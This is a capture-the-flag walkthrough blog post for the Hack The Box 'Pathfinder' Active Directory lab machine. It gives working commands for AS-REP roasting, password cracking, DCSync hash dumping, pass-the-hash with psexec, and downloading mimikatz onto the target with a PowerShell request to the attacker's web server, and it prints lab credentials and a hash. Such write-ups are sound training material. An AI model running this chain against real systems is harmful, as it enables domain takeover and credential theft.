Pathfinder Walkthrough

After the Shield Walkthrough, Here I'm with Pathfinder box and this is the last box you can play if you are a free member on HTB platform. Let's hack and grab the flags.

As I mentioned before, the starting point machines are a series of 9 easily rated machines that should be rooted in sequence. So it means, if you need to go through this box, first of all you must have a complete Shield machine.

Enough talks, 🥱 Let’s Get It Started 🐱‍💻

Disclaimers: No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedure to grab the flags! 🐱‍👤

00. Start Machine …

To start machine, just click "Join Machine".

Pathfinder

Then you can see the IP address for that machine. Usually it is 10.10.10.30 🤠

10.10.10.30

Before going enumeration steps we can simply ping to the IP address and check our VPN connection and whether the machine is alive. Sometimes the machines might "Disable" ping requests from passing through the firewall. But in most cases ping will be a success! 🙂

┌──(root💀Hidd3nWiki)-[~/Documents/Pathfinder]
└─# ping 10.10.10.30 -c 2
PING 10.10.10.30 (10.10.10.30) 56(84) bytes of data.
64 bytes from 10.10.10.30: icmp_seq=1 ttl=127 time=235 ms
64 bytes from 10.10.10.30: icmp_seq=2 ttl=127 time=237 ms

--- 10.10.10.30 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1005ms
rtt min/avg/max/mdev = 235.305/236.156/237.007/0.851 ms

As a ping result, It's TTL=127. There is only one route between machine and us (VPN). So definitely it will be a Windows machine.

01. Enumeration First …

01.1 Fast ports scan

As usual, run Nmap fast scan for all TCP ports to identify the ports which are open.

nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.30

-n  : Never do DNS resolution
-vv	: Extra verbosity
--open	: Output only open ports
-p-	: Full TCP ports range (65535)
-T4	: Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network

Here is the output 👇

└─# nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.30
Discovered open port 389/tcp on 10.10.10.30
Discovered open port 49676/tcp on 10.10.10.30
SYN Stealth Scan Timing: About 72.99% done; ETC: 11:27 (0:00:56 remaining)
Discovered open port 49714/tcp on 10.10.10.30
Discovered open port 49664/tcp on 10.10.10.30
Discovered open port 49667/tcp on 10.10.10.30
Discovered open port 636/tcp on 10.10.10.30
Discovered open port 88/tcp on 10.10.10.30
Discovered open port 9389/tcp on 10.10.10.30
Discovered open port 49666/tcp on 10.10.10.30
Discovered open port 3268/tcp on 10.10.10.30
Completed SYN Stealth Scan at 11:26, 173.96s elapsed (65535 total ports)
Nmap scan report for 10.10.10.30
Host is up, received echo-reply ttl 127 (0.24s latency).
Scanned at 2021-05-21 11:23:43 EDT for 175s
Not shown: 65466 closed ports, 45 filtered ports
Reason: 65466 resets and 45 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
5985/tcp  open  wsman            syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
47001/tcp open  winrm            syn-ack ttl 127
49664/tcp open  unknown          syn-ack ttl 127
49665/tcp open  unknown          syn-ack ttl 127
49666/tcp open  unknown          syn-ack ttl 127
49667/tcp open  unknown          syn-ack ttl 127
49673/tcp open  unknown          syn-ack ttl 127
49676/tcp open  unknown          syn-ack ttl 127
49677/tcp open  unknown          syn-ack ttl 127
49683/tcp open  unknown          syn-ack ttl 127
49695/tcp open  unknown          syn-ack ttl 127
49714/tcp open  unknown          syn-ack ttl 127

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 174.50 seconds
           Raw packets sent: 85085 (3.744MB) | Rcvd: 80313 (3.213MB)
                                                                    

This is why I recommend to scan all the ports. Here you can see there are so many ports open and by looking at the open ports (ldap,kpasswd5 & kerberos) we can definitely say that this machine is an Active Directory machine. We haven't touched that area before. Sharp your Active Directory enumeration skills, it will worth if you are willing to try Red Team activities.

Active Directory is a directory service developed by Microsoft for Windows domain networks. It is included in most Windows Server operating systems as a set of processes and services. Initially, Active Directory was only in charge of centralized domain management. [Copied from Wikipedia]

01.2 Run Nmap Scripting Engine

To get the best result, we can run the Nmap Scripting Engine for all open ports. Now we know all of the open ports and therefore we can point out and run the script engine as fast as possible.

┌──(root💀Hidd3nWiki)-[~/Documents/Pathfinder]
└─# nmap -sV -sC -oN DetailPorts.nmap -p 49667,49720,49676,49677,593,139,3269,389,9389,135,3268,49664,464,47001,636,49700,49665,49666,49672,5985,445,53,49683,88 10.10.10.30
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-21 11:43 EDT
Nmap scan report for 10.10.10.30
Host is up (0.23s latency).

PORT      STATE  SERVICE       VERSION
53/tcp    open   domain        Simple DNS Plus
88/tcp    open   kerberos-sec  Microsoft Windows Kerberos (server time: 2021-05-21 22:54:30Z)
135/tcp   open   msrpc         Microsoft Windows RPC
139/tcp   open   netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open   ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open   microsoft-ds?
464/tcp   open   kpasswd5?
593/tcp   open   ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open   tcpwrapped
3268/tcp  open   ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open   tcpwrapped
5985/tcp  open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open   mc-nmf        .NET Message Framing
47001/tcp open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open   msrpc         Microsoft Windows RPC
49665/tcp open   msrpc         Microsoft Windows RPC
49666/tcp open   msrpc         Microsoft Windows RPC
49667/tcp open   msrpc         Microsoft Windows RPC
49672/tcp closed unknown
49676/tcp open   ncacn_http    Microsoft Windows RPC over HTTP 1.0
49677/tcp open   msrpc         Microsoft Windows RPC
49683/tcp open   msrpc         Microsoft Windows RPC
49700/tcp closed unknown
49720/tcp closed unknown
Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h11m13s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2021-05-21T22:55:29
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.98 seconds

As it is an Active Directory machine, our enumeration steps will be different. ldap enumeration is pretty cool if you use BloodHound because it gives us graphical information. But it's already done in official writeup. So let's begin with my way. 😎😎

01.3 Discover more on domain

Nmap tells us the domain (Domain: MEGACORP) we are in. And don't forget we had some credentials from Shield machine. sandra:Password1234! First we can tryout with ldapdomaindump tool. Let's start.

ldapdomaindump -u MEGACORP\\sandra -p Password1234! -o ldapinfo 10.10.10.30 --no-json --no-grep  

-u    : DOMAIN\username for authentication, leave empty for anonymous authentication
-p    : Password or LM:NTLM hash, will prompt if not specified
-o    : Directory in which the dump will be saved (default: current)
--no-json    : Disable JSON output
--no-grep    : Disable Greppable output 

Here is the output, 👇👇

┌──(root💀Hidd3nWiki)-[~/Documents/Pathfinder]
└─# ldapdomaindump -u MEGACORP\\sandra -p Password1234! -o ldapinfo 10.10.10.30
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

┌──(root💀Hidd3nWiki)-[~/Documents/Pathfinder]
└─# cd ldapinfo

┌──(root💀Hidd3nWiki)-[~/Documents/Pathfinder/ldapinfo]
└─# ls
domain_users.html  domain_computers_by_os.html  domain_computers.html  domain_groups.html  domain_policy.html  domain_trusts.html  domain_users_by_group.html  

As you can see there are a lot of HTML files here. Among them, first I choose domain_users.html You can view through it from the browser. But instead of that, I will use html2text tool. You can simply install it by typing sudo apt-get install html2text . However the result will be like this. 👇👇

There are 5 accounts here. Guest, Administrator and krbtgt accounts are the default accounts. sandra and svc_bes accounts are user created ones. As you can see, I highlighted the svc_bes account because it has enabled theDONT_REQ_PREAUTH flag.

Now I'll simply explain what the kerberos authentication is. If you need to know what DONT_REQ_PREAUTH flag means, you must understand the kerberos authentication before.

This draft shows you how the normal authentication process. But if DONT_REQ_PREAUTH flag is set, second and third steps of the process can be missed. That means you can directly request the service ticket. Click here if you need more information about kerberos authentication.

02. Foothold

Now we are going to use impacket's GetNPUsers.py script to grab the request service ticket.

If you don't have that script installed on your computer follow below command to install it.

sudo -s
cd /opt && git clone https://github.com/SecureAuthCorp/impacket.git && cd impacket
sudo python3 -m pip install .
sudo python3 setup.py install
cd examples/

Type below commands to grab the request ticket.

python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py MEGACORP.LOCAL/svc_bes -dc-ip 10.10.10.30 -request -no-pass -format john

-request   : Requests TGT for users and output them in JtR/hashcat format (default False)
-no-pass   : Don't ask for password (useful for Kerberos authentication)
-dc-ip     : IP Address of the domain controller.
-format    : Format to save the AS_REQ of users without pre-authentication. Default is hashcat

Output will be like this. 👇👇

We grabbed the ticket. Now it's time to powerup John the Ripper and crack the hash. First of all copy that hash to file then run the john.🤠🤠

john hash --wordlist=/usr/share/wordlists/rockyou.txt

We got the password for svc_bes !!!

• svc_bes : Sheffield19

Now since we have the username and password, we can use Evil-WinRM tool. You can simply install it by typing gem install evil-winrm and hit enter, then the tool will be installed to your machine. 😎😎

Now, don't you have a question ❓ We already have the username and password for user sandra. Why didn't we use it? It's because there is nothing inside that account. It's just a simple user account.

Let's run the tool for svc_bes account.

evil-winrm -u svc_bes -p Sheffield19 -i 10.10.10.30

user.txt

So we got the user flag. Now, time to escalate privileges.

03. Privilege Escalation

Now we are going to perform DCSync attack and dump the NTLM hashes of all domain users using the Impacket's secretsdump.py script. 😈😈 Let's try it.

 /usr/share/doc/python3-impacket/examples/secretsdump.py MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30

Here is the output. 👇👇

As you can see, We have NTLM hash for the Administrator account. We can use this to perform Pass The Hash attack and gain elevated access to the system. Also we can use Impacket's psexec.py for this too.

See how impacket helps us during this machine. Give respect to the SecureAuth Corporation. 🙋‍♂️🙋‍♂️

03.1 Perform Pass The Hash Attack

First, copy the above Administrator's hash without triple colon (:::) at the end and then type this.

/usr/share/doc/python3-impacket/examples/psexec.py MEGACORP.LOCAL/Administrator@10.10.10.30 -hashes <NTML hash>

root.txt

We got the root flag too!!. 🧐🧐

root.txt

04. Post Exploitation

Since these boxes are all connected, we are going to grab the local admin hash too. So let’s upload mimikatz. You can download mimikatz tool from here and upload it to the box using python demon web server.

wget https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210512/mimikatz_trunk.zip && unzip mimikatz_trunk.zip && cd x64 && python3 -m http.server

powershell.exe -c "IWR -useBasicParsing http://<YourIP>:8000/mimikatz.exe -o mcat.exe"

Then we can run that file by typing .\mcat And then run the lsadump::sam command.

Here is the hash : 7facdc498ed1680c4fd1448319a8c04f

You can decode it through the crackstation site.

The password is : Password!

Finally we are done. and from here you must have VIP or VIP+ membership to play with other boxes.

Okay... I’ll see you on the next box! 🙋‍♂️🙋‍♂️

Find me on @twitter